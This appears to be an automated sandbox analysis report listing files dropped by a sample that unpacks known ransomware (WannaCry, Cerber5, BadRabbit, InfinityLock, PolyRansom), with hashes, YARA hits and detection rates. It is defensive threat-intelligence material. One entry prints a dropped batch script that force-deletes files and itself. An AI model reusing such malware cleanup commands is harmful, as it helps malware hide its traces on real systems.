                                                                                                        • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exe, Author: Florian Roth (with the help of binar.ly)
                                                                                                        • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exe, Author: us-cert code analysis team
                                                                                                        • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exe, Author: ReversingLabs
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 95%
                                                                                                        • Antivirus: Metadefender, Detection: 88%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):216064
                                                                                                        Entropy (8bit):3.1340875869032985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:YoCFfC303p22fkZrRQpnqjoi7l832fbu9ZXILwVENbM:rCVC303p22sZrRQpnviB832Du9WMON
                                                                                                        MD5:B805DB8F6A84475EF76B795B0D1ED6AE
                                                                                                        SHA1:7711CB4873E58B7ADCF2A2B047B090E78D10C75B
                                                                                                        SHA-256:F5D002BFE80B48386A6C99C41528931B7F5DF736CD34094463C3F85DDE0180BF
                                                                                                        SHA-512:62A2C329B43D186C4C602C5F63EFC8D2657AA956F21184334263E4F6D0204D7C31F86BDA6E85E65E3B99B891C1630D805B70997731C174F6081ECC367CCF9416
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_InfinityLock, Description: Detects InfinityLock ransomware, Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe, Author: ditekSHen
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 85%
                                                                                                        • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...sWAY.....................d......^.... ... ....@.. ....................................`.....................................W....@..._........................... ............................................... ............... ..H............text...d.... ...................... ..`.sdata..8.... ......................@....rsrc...._...@...`..................@..@.reloc...............J..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe
                                                                                                        File Type:ASCII text, with very long lines (344), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):344
                                                                                                        Entropy (8bit):5.8737512774790765
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:X6/R5KUbkOhBeJuIqGx/hrX1HNBDhQQdMwAjEhg9nCIvvoKzWmt98Jsb53XmUGaZ:XU/TbHhBWPXNBDhQQmrjEhMntv7t5pIG
                                                                                                        MD5:0F6B7D9756E6EAFE3D19DF9409D05DCF
                                                                                                        SHA1:01E03D21548DB7185747D641530DBC609AF62668
                                                                                                        SHA-256:35CBE5233AD0E6D2B265236951CABB2492FDCB5AC95A44588A2446C184DFEDFC
                                                                                                        SHA-512:2011F42C76511E823E52039450DB22FCFB58F0F87A5D6AF48631808BB3D04DD1E1973D6B358829155F311121D091DFBE416442585C3D659D40E26708DCBC095C
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:qXVsl9O7e6WZtBLrAfGB14f6Il707J3G95HpykVolc9qIuepWIXKEqekPqlCb9QWO43nZNozhboOXcpRkufXNNcR895Wz0R4QKL/HwZKvN23kXWnPlmCVb/BNbCl+fJedF1TZOl7dF1krqKqqg3bW8jT/UJE3AcYJ6yZbZJkgI4tPHuD+QBWnBVJo5Je4/smZeFRJmHzjS7iUtWqPgX5Uy82z7jVATEM8AC6DieE/EOe8cRVzhoR3vQ0bFvNOHWZyYKcu83K/63nZTyfqra1VBlUxV1R36vRh+dI8dAhld1S+jBKDJR7A5eiUl+YPhtDvBb0H/sr4eTOmUdlnNRtGg==
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe
                                                                                                        File Type:b.out overlay pure standalone object file 186 286 286 386 Large Text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):130
                                                                                                        Entropy (8bit):6.437451659049166
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Tlp32CZvp3tX8CM4B/aWXeX8jFt0HqvIzEze4bHJqnS3KMm:mCRp3N8C5B/3XZ5tMqPvjQnS3dm
                                                                                                        MD5:E882303AB63AC8A8FBA0DF8778783686
                                                                                                        SHA1:6E10DEF0DF6F2AADFDFC4331A23E0A417B98E5D1
                                                                                                        SHA-256:2F203B5B8D0E268158E74BC9FD5E087FF66B102380502C3D1DF26B929294D6F6
                                                                                                        SHA-512:B5DBBA5DF6403006AE7AB05D350848730883E0166B7AEA93C032DAC5F8050BAE6D478D229C739FFC99E4547919CD2F251E86CF115A42313A917634E97F9DABD7
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:........RSA1p........E.fc.......9OI.K(..W].......;..K.......2F...U.!6..../."g..U..."..VLU)..{...b..9.q..l..tS..dkW..2....
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2511528
                                                                                                        Entropy (8bit):7.210453995706242
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:6kAG2QGTC5xvMdgpdb1KRHGepUu2cGbqPs9+q2HRPTnFVSLE:6kAjQGTCnvMmpYQqPNRPTnF4Y
                                                                                                        MD5:DBFBF254CFB84D991AC3860105D66FC6
                                                                                                        SHA1:893110D8C8451565CAA591DDFCCF92869F96C242
                                                                                                        SHA-256:68B0E1932F3B4439865BE848C2D592D5174DBDBAAB8F66104A0E5B28C928EE0C
                                                                                                        SHA-512:5E9CCDF52EBDB548C3FA22F22DD584E9A603CA1163A622DB5707DBCC5D01E4835879DCFD28CB1589CBB25AED00F352F7A0A0962B1F38B68FC7D6693375E7666D
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 45%
                                                                                                        • Antivirus: Metadefender, Detection: 31%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y..v*..v*..v*...*..v*...*..v*...*I.v*...*.v*...*..v*..w*/.v*...*..v*...*..v*...*..v*Rich..v*........PE..L.....V............................Lh............@..................................v....@..................................s..,....@.......................`......@...............................Xm..@...............@....e.......................text............................... ..`.rdata..z...........................@..@.data............0..................@....rsrc........@......................@..@.reloc..2....`......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                        Category:dropped
                                                                                                        Size (bytes):86016
                                                                                                        Entropy (8bit):7.7036277170460306
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:vpeW2JCTz5eDMn1Wi8N36flDRdHOjN0O02SHU00wCpEbE1PDai41lkgD:xH2JCTz5mmYoDRdHOB0O3d00wiEY134D
                                                                                                        MD5:9D15A3B314600B4C08682B0202700EE7
                                                                                                        SHA1:208E79CDB96328D5929248BB8A4DD622CF0684D1
                                                                                                        SHA-256:3AB3833E31E4083026421C641304369ACFD31B957B78AF81F3C6EF4968EF0E15
                                                                                                        SHA-512:9916397B782AAAFA68EB6A781EA9A0DB27F914035DD586142C818CCBD7E69036896767BEDBA97489D5100DE262A554CF14BCDF4A24EDDA2C5D37217B265398D3
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                        • Antivirus: Metadefender, Detection: 63%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@..........................................$..{(.k..Q...M.D......S5I......3..:........I-..Ea.........:..l~.?~.?~.?.U.?Y.?...?..?p..?..?#..?..?...?e.?.g.?..?Rich~.?........PE..L..._l.H.....................@......0.............@.............................................................................T........=..........................................................................................................UPX0....................................UPX1................................@....rsrc....@.......@..................@..............................................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19
                                                                                                        Entropy (8bit):3.932138039759377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:cc7knQfvn:3kGvn
                                                                                                        MD5:4AFB5C4527091738FAF9CD4ADDF9D34E
                                                                                                        SHA1:170BA9D866894C1B109B62649B1893EB90350459
                                                                                                        SHA-256:59D889A2BF392F4B117340832B4C73425A7FB1DE6C2F83A1AAA779D477C7C6CC
                                                                                                        SHA-512:16D386D9ECE30B459FD47CA87DA1F67B38D52A8E55F8FD063762CB3B46AE2C10BC6EAC7359B0D1EF4C31C1AC8748AE8F62F8816EFF0691ABDD3304DF38E979A5
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:WScript.Sleep(50)..
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1227610
                                                                                                        Entropy (8bit):7.967961253692764
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:Lutr5OUF7zfbMEsJiZp8uSOBpik+Qijrcq0y0JL4SprofsCghjmxQ:LuXfbMvGei9yjrcq0y0JL4ggghjv
                                                                                                        MD5:910DD666C83EFD3496F21F9F211CDC1F
                                                                                                        SHA1:77CD736EE1697BEDA0AC65DA24455EC566BA7440
                                                                                                        SHA-256:06EFFC4C15D371B5C40A84995A7BAE75324B690AF9FBE2E8980F8C0E0901BF45
                                                                                                        SHA-512:467D3B4D45A41B90C8E29C8C3D46DDFBDEE9875606CD1C1B7652C2C7E26D60FEDAC54B24B75DEF125D450D8E811C75974260BA48A79496D2BDAF17D674EDDB47
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 68%
                                                                                                        • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..9..9..9...a..1...a..*..9....'.z.<..0.l.8..0.k....0.}.8..'.{.8..0.~.8..Rich9..........PE..L...f.K..................................... ....@..........................P.......6...............................7..3....)..........`>..........................."............................................... ...............................text...n........................... ..`.rdata..e.... ......................@..@.data........@.......&..............@....CRT.................(..............@..@.rsrc...`>.......@...*..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):199168
                                                                                                        Entropy (8bit):7.816608369359199
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:slkfrcHVaq65Oe/ALwm19MYDzMLGquSOt+nSmgevSvoWAnvN0bfINcfln8rvK:Wkfrc0q47/UwQFSFnH9SArvakSflnCS
                                                                                                        MD5:8803D517AC24B157431D8A462302B400
                                                                                                        SHA1:B56AFCAD22E8CDA4D0E2A98808B8E8C5A1059D4E
                                                                                                        SHA-256:418395EFD269BC6534E02C92CB2C568631ADA6E54BC55ADE4E4A5986605FF786
                                                                                                        SHA-512:38FDFE0BC873E546B05A8680335526EEC61CCC8CF3F37C60EEE0BC83EC54570077F1DC1DA26142488930EABCC21CB7A33C1B545A194CBFB4C87E430C4B2BFB50
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 95%
                                                                                                        • Antivirus: Metadefender, Detection: 83%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eU!.!4O.!4O.!4O.!4O. 4O.Rich!4O.................PE..L...{.............................................@.......................... ..........................................................\............................................................................................................text............................... ....rsrc...\........................... ...........IS&.u..n.y...P0..c{. ..J..b.>..o.i...R...3.Ap..3...~.EW_.Y.}+..A.2.h.(N^.....B....e....l.h.}.R....?.....y..(.3....Gp.u..n.....P.j...2.R2.(.7.....5...m).&.G..RvZS....?$. t.z...e|3.-..........pRj...c.....]b.7T*..D..R.s...lS.\.i..0..yL?.....E{......ex..+.\.l..........AS..`_I8.....A..]c.r...h....Z......Z[../.f.}.p...[.6.t...IAx`....K.K@v}.#.x.../R.......@!:A.;E39.J......'1....3.)BE..........TER*b....O........U.rS_<..........E.....@....0v.....|.we.....@].
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                        Category:dropped
                                                                                                        Size (bytes):195400
                                                                                                        Entropy (8bit):7.873003999274124
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:15TDpNFVbxDSXJFFGhcBR1WLZ37p73G8Wn7GlDOg+ELqdSxo5XtIZjnvxRJgghaR:157TcfFPB6B3GL7g+me5aZjn5VlI9T/
                                                                                                        MD5:248AADD395FFA7FFB1670392A9398454
                                                                                                        SHA1:C53C140BBDEB556FCA33BC7F9B2E44E9061EA3E5
                                                                                                        SHA-256:51290129CCCCA38C6E3B4444D0DFB8D848C8F3FC2E5291FC0D219FD642530ADC
                                                                                                        SHA-512:582B917864903252731C3D0DFF536D7B1E44541EE866DC20E0341CBEE5450F2F0FF4D82E1EEE75F770E4DAD9D8B9270AB5664FFEDFE21D1AD2BD7FE6BC42CF0E
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 70%
                                                                                                        • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................^...|.......0.......p....@..........................0......7........................................t.......p..h...............h............................................................p...............................text....].......^.................. ..`.rdata.......p.......b..............@..@.data....T...........v..............@....ndata...................................rsrc...h....p.......z..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe
                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1252, Author: brbrb-233452345, Template: Normal.dotm, Last Saved By: brbrb-233452345, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Mar 13 23:34:00 2012, Last Saved Time/Date: Tue Mar 13 23:34:00 2012, Number of Pages: 1, Number of Words: 37, Number of Characters: 211, Security: 0
                                                                                                        Category:dropped
                                                                                                        Size (bytes):26112
                                                                                                        Entropy (8bit):2.5899084749736088
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:yonQ4IuqyZDQozyGRsp6bfu5jKIDa05vZXidq/0GfxFpzd51LAqj+eJBp98Lwb1S:9WDyZEozyGc6ri5bv/0ylca+e/f
                                                                                                        MD5:2FC0E096BF2F094CCA883DE93802ABB6
                                                                                                        SHA1:A4B51B3B4C645A8C082440A6ABBC641C5D4EC986
                                                                                                        SHA-256:14695F6259685D72BF20DB399B419153031FA35277727AB9B2259BF44A8F8AE3
                                                                                                        SHA-512:7418892EFE2F3C2FF245C0B84708922A9374324116A525FA16F7C4BCA03B267DB123AD7757ACF8E0BA15D4EA623908D6A14424088A542125C7A6394970DD8978
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:......................>...................................0...............-......................................................................................................................................................................................................................................................................................................................................................................................................................................................[.............................bjbj..........................4...................................................................................................................................................................................................................0...................................................................$.......&.......&.......&.......&.......&.......&...$...........w...f...J.....................................................................
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):225280
                                                                                                        Entropy (8bit):7.663735783294972
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:EJv/3Ppzq+M4Lh5VWK5qlYRV+hvuFiweXXbGgL90v5mq33Z3:8hzEA5GlYMWFBeXvx0c+3
                                                                                                        MD5:3ED3FB296A477156BC51ABA43D825FC0
                                                                                                        SHA1:9CAA5C658B1A88FEE149893D3A00B34A8BB8A1A6
                                                                                                        SHA-256:1898F2CAE1E3824CB0F7FD5368171A33ABA179E63501E480B4DA9EA05EBF0423
                                                                                                        SHA-512:DC3D6E409CEE4D54F48D1A25912243D07E2F800578C8E0E348CE515A047ECF5FA3089B46284E0956BBCED345957A000EECDC082E6F3060971759D70A14C1C97E
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 95%
                                                                                                        • Antivirus: Metadefender, Detection: 82%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eU!.!4O.!4O.!4O.!4O. 4O.Rich!4O.................PE..L...{....................\...........(.......p....@..................................................................................p..\............................................................................................................text...I[.......\.................. ....rsrc...\....p.......^.............. .............4)...t....I.....px.:.0.57. Jr~L..3.;..FkJ......F.W.`.;..$g..... u.l......7...)..SO.=...*.).!vZmX4....Er...H0....*..........,./$.....@..}D........b.q...k.w...h.P..E..(R.....m..2)+b.......{.\.0......}".?.....6.HJK}..s..K.=L...I.C....#.W....aY...o......bvr.myH%.5.@.{..>...&.h6.#=.[.......N....kD..(....?.t.'z..s..*.p...._YA...T...dI..Ry....H=?..Y.=..+........[.d$..C?eE.....N.(.'.V(....l....9IJ....5.$B..].O.3..AJ.B.5...{]...` T. >......3.L.\...5s.......
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                                        Category:dropped
                                                                                                        Size (bytes):757637
                                                                                                        Entropy (8bit):7.942040838313248
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:kUWA3AheuswygKEOKlC0DaWL8ldxj1UT1fzosC2kyINJATi1v2yUQpf84i:kUWqistgKErL8P6VzosCfE6TNpf8D
                                                                                                        MD5:382430DD7EAE8945921B7FEAB37ED36B
                                                                                                        SHA1:C95DDAEBE2AE8FBCB361F3BF080D95A7BB5BF128
                                                                                                        SHA-256:70E5E902D0AC7534838B743C899F484FE10766AEFACC6DF697219387A8E3D06B
                                                                                                        SHA-512:26ABC02BDE77F0B94613EDC32E0843AC71A0A8F3D8BA01CB94A42C047D0BE7BEFEF52A81984E9A0FA867400082A8905E7A63AAAF85FA32A03D27F7BC6A548C3B
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 78%
                                                                                                        • Antivirus: Metadefender, Detection: 28%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}...9.o.9.o.9.o..a..1.o..a..*.o.9.n...o.'...<.o.0..8.o.0....o.0...8.o.'...8.o.0...8.o.Rich9.o.........PE..L.....J.................................... ....@..........................P......7...............................P7..3....(..........`>..........................."............................................... ...............................text...|........................... ..`.rdata....... ......................@..@.data........@.......$..............@....CRT.................&..............@..@.rsrc...`>.......@...(..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):112
                                                                                                        Entropy (8bit):4.768536250532167
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:jGknQngol9LL3BGc2moKY9LL32JCK0rSgK0/o+0K0+ov:6kqgAbBGdmoKWb/egXo+03
                                                                                                        MD5:BAE1095F340720D965898063FEDE1273
                                                                                                        SHA1:455D8A81818A7E82B1490C949B32FA7FF98D5210
                                                                                                        SHA-256:EE5E0A414167C2ACA961A616274767C4295659517A814D1428248BD53C6E829A
                                                                                                        SHA-512:4E73A24161114844D0E42C44C73205C4A57FA4169BD16C95FB7E9D6D5FCDF8BD01741541C77570556AC1F5EE260DA67A9041F40381B6C6E0601C9DE385BDC024
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:echo WScript.Sleep(50)>%TEMP%/file.vbs..cscript %TEMP%/file.vbs..del /F /Q file.js..del /F /Q %1..del /F /Q %0..
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                        Category:dropped
                                                                                                        Size (bytes):119296
                                                                                                        Entropy (8bit):7.911347099102218
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:pYV/aVHN9ySTn34w33FVTyuGAxsvBLSqAKZqoqrxy031l3y:8adNlltyu3Pa5gr33
                                                                                                        MD5:41789C704A0EECFDD0048B4B4193E752
                                                                                                        SHA1:FB1E8385691FA3293B7CBFB9B2656CF09F20E722
                                                                                                        SHA-256:B2DCFDF9E7B09F2AA5004668370E77982963ACE820E7285B2E264A294441DA23
                                                                                                        SHA-512:76391AC85FDC3BE75441FCD6E19BED08B807D3946C7281C647F16A3BE5388F7BE307E6323FAC8502430A4A6D800D52A88709592A49011ECC89DE4F19102435EA
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 86%
                                                                                                        • Antivirus: Metadefender, Detection: 78%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................................................................................................................................................PE..L...)..G.............................d.......p....@..........................................................................t.......p.......................................................f......................................................UPX0....................................UPX1................................@....rsrc........p......................@......................................................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):320760
                                                                                                        Entropy (8bit):6.315890725389197
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:nl578cxdGY87FohbnmM2i8ito7wTmCbL94KCT3OAmK:nl59zH8MiM2z+NLQBN
                                                                                                        MD5:FE1BC60A95B2C2D77CD5D232296A7FA4
                                                                                                        SHA1:C07DFDEA8DA2DA5BAD036E7C2F5D37582E1CF684
                                                                                                        SHA-256:B3E1E9D97D74C416C2A30DD11858789AF5554CF2DE62F577C13944A19623777D
                                                                                                        SHA-512:266C541A421878E1E175DB5D94185C991CEC5825A4BC50178F57264F3556080E6FE984ED0380ACF022CE659AA1CA46C9A5E97EFC25FF46CBFD67B9385FD75F89
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: cerber3, Description: Cerber3 , Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe, Author: pekeinfo
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 91%
                                                                                                        • Antivirus: Metadefender, Detection: 76%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`x...+...+...+B..+...+..u+...+...+...+..+...+...+...+..+...+..+...+Rich...+........PE..L.....sY.....................8....................@.................................{.......................................X...........0...............................................................................0............................text.............................. ..`.rdata...).......*..................@..@.data...............................@....rsrc...0...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2066944
                                                                                                        Entropy (8bit):7.407449411158182
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:FH/1Fdq0wneDrEoYxWFjmYMcKabLVp3diY7kp:FH/1Fdq0nIo2YAcl/NisA
                                                                                                        MD5:C7E9746B1B039B8BD1106BCA3038C38F
                                                                                                        SHA1:CB93AC887876BAFE39C5F9AA64970D5E747FB191
                                                                                                        SHA-256:B1369BD254D96F7966047AD4BE06103830136629590182D49E5CB8680529EBD4
                                                                                                        SHA-512:CF5D688F1AEC8EC65C1CB91D367DA9A96911640C695D5C2D023836EF11E374FF158C152B4B6207E8FCDB5CCF0EED79741E080F1CBC915FE0AF3DACD624525724
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 86%
                                                                                                        • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o...........C.^....C.\.......O....|.....l.=....o.&....s......}.....y....Rich............PE..L....FL..........................................@.................................a. .........................................|....`..............................`..................................@.......................@....................text............................... ..`.rdata..............................@..@.data............<..................@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):441899
                                                                                                        Entropy (8bit):7.891913976230692
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:BHNTywFAvN86pLbqWRKHZKfErrZJyZ0yqsGO3XR63:vT56NbqWRwZaEr3yt2O3XR63
                                                                                                        MD5:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                        SHA1:DE5C8D858E6E41DA715DCA1C019DF0BFB92D32C0
                                                                                                        SHA-256:630325CAC09AC3FAB908F903E3B00D0DADD5FDAA0875ED8496FCBB97A558D0DA
                                                                                                        SHA-512:74ECA8C01DE215B33D5CEEA1FDA3F3BEF96B513F58A750DBA04B0DE36F7EF4F7846A6431D52879CA0D8641BFD504D4721A9A96FA2E18C6888FD67FA77686AF87
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe, Author: Florian Roth
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 93%
                                                                                                        • Antivirus: Metadefender, Detection: 83%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&\..G2.G2.G2.?..G2.?..G2.....G2.....G2.?..G2.G3.G2...G2...G2.Rich.G2.........................PE..L......Y.................0...................@....@.......................... ............@..................................m..d........p...............4...........................................................@..t............................text............0.................. ..`.rdata..*0...@...2...4..............@..@.data...<............f..............@....rsrc....p.......r...h..............@..@.reloc..N...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe
                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4070400
                                                                                                        Entropy (8bit):6.189869855231506
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:5gn0YzFj7UZcFz6Cu0Gi+xz+BMZ0XpP7tyXs2QdlXjrZyDcJcikpq3ISEsJNL4wS:5a0eFjvIi+xy/ZYcWdwEsv4p1Xo302C
                                                                                                        MD5:F339A8C9E0B32D73C4BAF85EAA120FDF
                                                                                                        SHA1:7A587463F564C348A32B1DE4914132B455A650E7
                                                                                                        SHA-256:1D9AAA4C55FCA0F434345C8F90DDA5CEBB0E1B37113F16ABEFD5B237A37034B1
                                                                                                        SHA-512:FE70715DFAE72F57838F1D7E82BF7614684E13825F8F5FFD961F6A597A2182D6B66682A0432664506D0BF6B4B53E5269C9562411CB7686F8EF16595CA5E4132D
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                        Reputation:unknown
